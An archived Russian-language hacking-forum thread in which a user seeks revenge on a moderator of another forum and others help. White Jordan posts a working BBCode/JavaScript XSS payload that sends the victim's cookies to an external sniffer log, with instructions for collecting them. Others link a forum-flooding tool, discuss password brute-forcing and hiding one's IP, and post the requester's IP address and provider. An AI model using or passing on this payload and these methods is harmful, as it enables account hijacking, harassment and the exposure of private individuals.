Просмотр полной версии : Помогите сделать , что-нибудь плохое с форумом
Всё уже добрые люди рассказали... :)
White Jordan
17.04.2005, 23:54
Моя сладкая детка. Там регестрация отключина.
Есть статьи по взлому. Можешь сама взломать.
Моя сладкая детка. Там регестрация отключина.
Есть статьи по взлому. Можешь сама взломать.
Я уже перерыскала весь интернет и ничего не могу.
Я знаю что регистрация отключена, а это как то влияет на то что я задумала. Если Вам нужен ник для этого ,то я Вам дам свой , у меня есть запасной :)
White Jordan
17.04.2005, 23:59
Давай. Тебе кого хеш надо?
Второго вопроса не поняла, уж простите дурочку :)
White Jordan
18.04.2005, 00:20
А кого тебе хеш надо?
И вообще ты знаешь, что как только ты туда Модом зайдёшь, твой ИП (ip) появится в логах? Не боишся, что поймают?
White Jordan
18.04.2005, 00:27
Ну хоршо, если у него Браузер Интерент Эксплорер, то его хеш, (От хеш, при помощи брута можно достать пассворд. Чем труднее пассворд, тем дольше.) не проблема достать.
А вот когда ты зайдёшь под его ником, как ты потом будешь себя прятать? Тебя же поймают, так как ты на солидном форуме хочешь, что то зделать плохое. Такие люди просто так не отстанут.
Ты понемаешь последствия?
может тогда программу меняющую Ip скачать? правда я уже так пробовала, но меня потом Dsl вырубает на пол часа. Может что посоветуете ?
ну можно попробовать http://www.anonymizer.ru/ , но у меня что то только один раз получилось туда так войти
White Jordan
18.04.2005, 00:38
Вот Молодец, что ты начила думать о самом главном.
Вот Я тебе обьясню. Любую прокси, или анонимайзер который ты будешь использовать, тебя легко выдасть как только они (С сервером к которому ты подключишься) с ним свяжутся.
Когда ты куда то подсоеденяешься, то на том месте остаётся лог твоего настоящего ИП. То есть форум который ты хочешь взломать, шутить не будет. Он просто возьмёт ИП какой то он небыл когда ты зайдёшь под ником Модератора, свяжется с этим сервером, а тот сервер даст им твой настоящий ИП.
Потом уголовное дело у твоей работе гудбай. (Пока то есть)
Если что то взламывать, то не солидные форумы.
А Вы считаете , что это солидный форум? Может я только со стороны смотрю и ничего не понимаю, но это какой то базар просто там и админу я сморю наплевать на ывсё , поэтомиу я и сделала вывод, что это шарашкина контора.
А чтоже делать? Что Вы посоветуете?
Вы знаете я действительно боюсь всего , что Вы написали, я зайду этим ником только один раз и дам понять , что у меня тоже есть противоядие от них и всё прекращу :)
White Jordan
18.04.2005, 00:50
Я тебе не советую шутить с огнём.
Любой форум имеющий имя страны (Да притом той страны в которой Я родился!!! :D :D :D :D :D )
Солидный форум.
Если без шуток, то имя страны (Да притом той страны в которой Я родился!!! :D :D :D :D :D Ютиль взломаешь форум убью!!! =) )
Действительно имеет значимость, так как они там быстро всех находят. :rolleyes:
Если хочешь отомстить, просто флуди их день и ночь меняя разные акаунты и прокси. :rolleyes:
Способ этот закону не подлежит и их взбессит. :cool:
Малышь исользуй флудер для форумов!!!
Это проще и безопаснее и не запрещено законом =)
Вот читай:
Denyo Launch III Server FLOOD tool. Наикрутейшая хакерская тулза для вывода из строя форумов путем жесткого закидывания сообщениями. Была разработана известными турецкими хакерами, а впоследствии использована неизвестными турецкими ламерами, которые попытались объявить войну крупным русским онлайн-бордам. И поначалу им это даже удалось, жертвами стали www.mazafaka.ru и несколько других известных русских проектов. Впрочем, мазафаковцы быстро оправились и не только дали достойный отпор однообразным атакам турков, но и доработали их флудилку, превратив ее в смертельное оружие. Возможности программы настолько обширны, что разбегаются глаза, вываливается язык и отвисает челюсть. Можно банально вписать URL ветки форума и нажать Launch!, но можно также настроить все вручную, вплоть до кукисов, посылаемой версии браузера и много чего еще. Софтина содержит в себе MAIL сервер, благодаря чему может автоматически подтверждать регистрацию нового юзера на форуме, присланную на мыло (почтовый адрес для регистрации выглядит так: blabla@твой_ip). С помощью вкладки Site Info Tool ты сможешь узнать версию сервера, просмотреть исходники странички и "печеньки" и сделать traceroute. Ну, а возможность скрытой работы позволит тебе закачать эту хак-прогу на виндовый шелл или по-тихому оставить в интернет-клубе. С админом клуба, если что, разбирайся сам .
Скачать : http://www.xtools.org/other/denyo.rar
Я не буду его ломать хорошо и не буду больше никого просить, но пожалуйста достаньте пароль , если я чтото буду делать с этими никами то буду делать через интеренет кафе или ещё где-нибудь. Лазеек много :)
White Jordan
18.04.2005, 00:56
SpiderX Молодец опять, но это она.....=)
ооооооо, я её сегодня тут искала , искала и вот Вы мне её скинули Спасибо.! Но я всё равно буду надеяться на пароль(и) . Пажааааааалуйста :)
SpiderX сейчас же начну флудить :)
White я понял =)
Земляк ?
На самом деле ромашка - злобный дядька, который мешает жить форуму!!!
Вот он под видом милого существа, вроде ромашки пытается развести добреньких наивнейших ребят на пассы =)))
Вот Молодец, что ты начила думать о самом главном.
Вот Я тебе обьясню. Любую прокси, или анонимайзер который ты будешь использовать, тебя легко выдасть как только они (С сервером к которому ты подключишься) с ним свяжутся.
Когда ты куда то подсоеденяешься, то на том месте остаётся лог твоего настоящего ИП. То есть форум который ты хочешь взломать, шутить не будет. Он просто возьмёт ИП какой то он небыл когда ты зайдёшь под ником Модератора, свяжется с этим сервером, а тот сервер даст им твой настоящий ИП.
Потом уголовное дело у твоей работе гудбай. (Пока то есть)
Если что то взламывать, то не солидные форумы.
Глупости, это что банк ?
1) состава преступления нет
2) никто заниматься такой ерундо не будет
White Jordan
18.04.2005, 01:03
SpiderX что у тебя скачивание не работает? Скачивать да скачивает, но вот потом открываешь, и какие то проблемы.....
И да Я в там родился.... :p
Майор поймают так как Я там родился.....=)
ромашка,
Могу показать как это тебе зделать самой, пассворд тебе не нужен так как ты Модератора хочешь поиметь а не Админа.
Только смотри там сильно не хулигань!!
Вот когда будешь писать сообщение, вставь в него сейчас найду сниффер подожди.......
У мя с прогой все в порядке!
Ты там галочки поставил при включении, что согласен с условиями создателей проги?
Делайте как знаете =)
Пошйду спать! Завтра в Универ =(((
будь он неладен =)
Ну я просто шучу =)
Это я злостный дядька, вон и аватара злоБная =)
White Jordan is ок жду.....
SpiderX спасибочки за прогу и спокойной ноченьки тебе :)
Редко к нам девушки заходят !!! =)
Даже приятно!
Ты с какого города ромашка?
White Jordan
18.04.2005, 01:14
Тем более ты в Гермнии!!! :D
А ну стобой вообще разговаривать не будут!!
Я в Германии тоже жил и у меня там Дядя живёт они помешены (Герамнци =) )какие то. Что небудь зделаешь и хана.
Сеычас ищу подожди.
2 SpiderX твой арчайв не роспаковывается.
217.82.37.192 Deutsche Telekom AG, Internet service provider Ромашка =)
White Jordan
18.04.2005, 01:18
Когда качаешь твой фаил, открываешь и там какие то с фаилом проблемы. Не распаковывается.
Рамашка на.
[COLОR=[IМG]http://aaa.aa/=`aaa.jpg[/IМG]]` style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie) [/COLОR]
Вставь в сообщение, пусть твоя жертва на ниё посмотрит,
пойдёшь сюда, http://antichat.ru/sniff/log.php
и своруешь его кукиз.
White Jordan is да мне уже честно говоря наплевать что будет потом , обидели меня ооочень сильно и я просто обязана что-нибудь натворить
White Jordan
18.04.2005, 01:21
Рамашка звать White Jordan.
"IS" по Инглешу, это тоже самое что и "IST" по Германски =) то есть "есть", находится.
У всех мембаров тут это есть. :cool:
White Jordan is _ да сегодня я об этом тоже гдето читала., но я такая тупенькая в этом , но попробую конечно же. А может всё-таки скажите просто пароль, если можно. В долгу не останусь , чем смогу тоже помогу
Понял!
Я реально не в курсе что с ним! =(
Сам скачал и вроде все окей !
Лан все Баеньки =) Все пока!!!
White с тобой скоро переговорим =)
White Jordan
18.04.2005, 01:24
Звать.............гы гы гы White Jordan!!!! =))))))))
А что именно ты не понила?
Spider X а чтоже я понадеялась так на эту прогу , а теперь ты убегаешь так и не дав нормальную
White Jordan
18.04.2005, 01:28
Всё вродебы теперь всё с прогой нормально.
White Jordan ist :) да вроде всё как понял, но только не знаю куда эту ссылочку в форуме вставлять и потом я так понимаю нужно идти туда куда Вы написали и там , чтото высветится об этом засранце да? Но то что высветится яж наверное не пойму :)
Да раБотает она!!! Все в порядке сам только что скачал еще раз!!!
Вот уж увольте оБъяснять как ею пользоваться!
Пока
может всё-таки поделитесь паролем егошним? ;)
SpiderX спасибочки, постараюсь сама разобраться. Спокойной ноченьки ещё раз!
White Jordan
18.04.2005, 01:37
Ну тебе пассворд совершенно не нужен! Ты сама зайдёшь как только получишь его информацию.
Просто пассворд долго добывать. Надо брутить и это совершенно бессмысленно так как ты соровно и так зайдёшь под его ником.
Короче возьми мой код, иди на мой форум
http://www.whitejordan.ipbfree.com/index.php?act=idx
и зайди под моим ником.
Пассворд тебе сейчас пошлю. Пойди туда ко мне и тренеруйся.
White Jordan, я там буду админом типа ? :)
White Jordan а Вы можете этого ника узнать IP?
White Jordan
18.04.2005, 01:43
Да ты там будешь у меня Админом.
И ещё.
Чтобы узнать МНЕ ИП твоего Модератора, мне нужно следить когда он там появится на твоём форуме.......
White Jordan он там тусуется практически всегда, сейчас я уверена он в скрытых пользователях сидит тоже
White Jordan
18.04.2005, 01:47
Там сейчас скрытых пользователей нет.....=)
И взламывать не очень трудно тебе понравится....=)
White Jordan ок попробую, жду пароля
White Jordan а могу я сама пробить его ИП , что для этого нужно , на будущёё хотелабы знать.
White Jordan
18.04.2005, 01:50
Уже давны давно тебе его послал.
И скажи как дело в будущем пошло...... :cool:
White Jordan
18.04.2005, 01:51
White Jordan а могу я сама пробить его ИП , что для этого нужно , на будущёё хотелабы знать.
Ну ты нет это намного сложней.....
Это тебя уже должен кто то учить и стабой сидеть и всё тебе обьяснять.
White Jordan опсики, оказывается кое где лежал он пасс то :), а сколько он будет действителен времени?
а где ты сейчас сам находишься?
White Jordan
18.04.2005, 02:00
White Jordan опсики, оказывается кое где лежал он пасс то :), а сколько он будет действителен времени?
Ну пока Я его не сменю.
И Я сейчас нахожусь на форуме античата. =)
Пойти к себе на форум? =)
Там густо пусто прям как Я это и люблю......=)
да не я имела ввиду город :). А завтра ещё будет действителен для меня?
а то сегодня я туда уже не пойду тренироваться, баиньки пора уже делать идти :)
White Jordan
18.04.2005, 02:05
Я в Новой Зеландии. =)
И да завтра мой форум никуда не денится. =)
Он специально и существует для взлома. Я его год назад именно для этой цели и приобрёл. =)
Вот теперь научился...... :cool:
У тебя сейчас который час?
White Jordan
18.04.2005, 02:07
Тут что значит тут? На форуме чтоли?
Вродебы нет.
У тебя сейчас вообще сколько времени та?
White Jordan, а может ты моим учителем Тшедоши станешь по хакерству а?
White Jordan
18.04.2005, 02:07
Только если ты моей женой. =)
White Jordan
18.04.2005, 02:09
У меня 10.08 утра. =)
Видешь как нам не везёт с тобой!? =)
Только если ты моей женой. =)
:D ой ой не могу, такая лорогая информация , что ты можешь её только своей жене доверить ? ;)
White Jordan
18.04.2005, 02:12
Ну и сыну наверное да и всё......=)
У меня 10.08 утра. =)
Видешь как нам не везёт с тобой!? =)
мдаааа, действительно, ты уже выспался во всю , а я бедненькая тут ночами думаю , как напакостить и ещё к тому же хакерством заняться :D
Ну и сыну наверное да и всё......=)
а дочь , что лысая чтоли ? :p
White Jordan
18.04.2005, 02:14
Лучьше не занимайся. Чушь полная, занимает кучу времени а самое главное, когда возникают естесвенные недоразуменья и проблемы да ктому же ещё и вопросы - чудо, когда кто то поможет.
White Jordan
18.04.2005, 02:16
а дочь , что лысая чтоли ? :p
Ну дочь Я бы туда не вводил....=)
А сына, ну надо же первенцу передовать свои знания? =)
Ясненько! Ну , а если что , то к тебе можно будет обращаться?
White Jordan
18.04.2005, 02:18
Так ты же меня не найдёшь.....меня поймать ой как трудно.....=)
Тем более у нас время разное. =)
Просто задавай все вопросы на форуме, и тебе спокойно Я уверен ответят Я или другие. Форум для этого и есть. =)
может всётаки например асю дашь или чтото в этом роде? Я не хочу тебя терять :)
White Jordan
18.04.2005, 02:23
Слушай а может действительно мне надо считать сколько людей меня уже тут на форуме мою аську попросили??? :p :D :D :D
Уж не совру если скожу что 20+ и все тут много кратно просили мою аську!!!! :D
Ну вот поэтому у меня её и нет потому что все её просят. =))))
ок понятненько, буду тогда тебя разыскивать тут . :)
а завтра займусь учёбой флуда
Whide Jordan спасибо тебе огромнейшее за помощь и всего тебе самого наилучшайшего во всём :)
White Jordan
18.04.2005, 02:28
Увидемся и удачи. =)
Спокойной ночька. =)
Ещё раз спасибо. До встречи!!!
Круто вы поговорили ;)
;) :p
White Jordan
18.04.2005, 02:34
Да пожалуйста всегда рад помочь хорошим людям. =)
White Jordan извиняюсь но я прискакала снова :) Я сейчас посмотрела ссылочку которую ты мне дал, а там стоит конкретно античат мелинькими буквачками, так моя жертва напорится и поймёт что почём , он не дурак далеко и пойдёт сюда и погуляет тут, а здесь все мои данные и о его нике тоже и об этом сайте тоже. Что делать , как это всё затереть?
White Jordan
18.04.2005, 02:52
White Jordan извиняюсь но я прискакала снова :) Я сейчас посмотрела ссылочку которую ты мне дал, а там стоит конкретно античат мелинькими буквачками, так моя жертва напорится и поймёт что почём , он не дурак далеко и пойдёт сюда и погуляет тут, а здесь все мои данные и о его нике тоже и об этом сайте тоже. Что делать , как это всё затереть?
Не, если ты пошлёшь мой код который Я тебе дал, то он видеть ничего не будет если у него браузер Интернет Эксплорер.
Если же у него браузер Фаерфокс или Мозила, то не только не важно что он видеть будет на таких двух браузерах, сам код работать не будет.
А тут не надо ничего редактировать не бойся. Он тебя не найдёт и мы тебя в обиду не дадим. =)
Спасибо на добром слове :) . В общем я так поняла , я вставляю то что ты дал в какую-нибудь темку в форуме и он просто на это должен поглазеть да?
Я конечно же завтра в любом случае тренировкой на твоём форуме займусь
Ну раз ты поняла то все тема закрывается.
Сужу по первому посту.
Случее чего связывайся с ним в приват.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot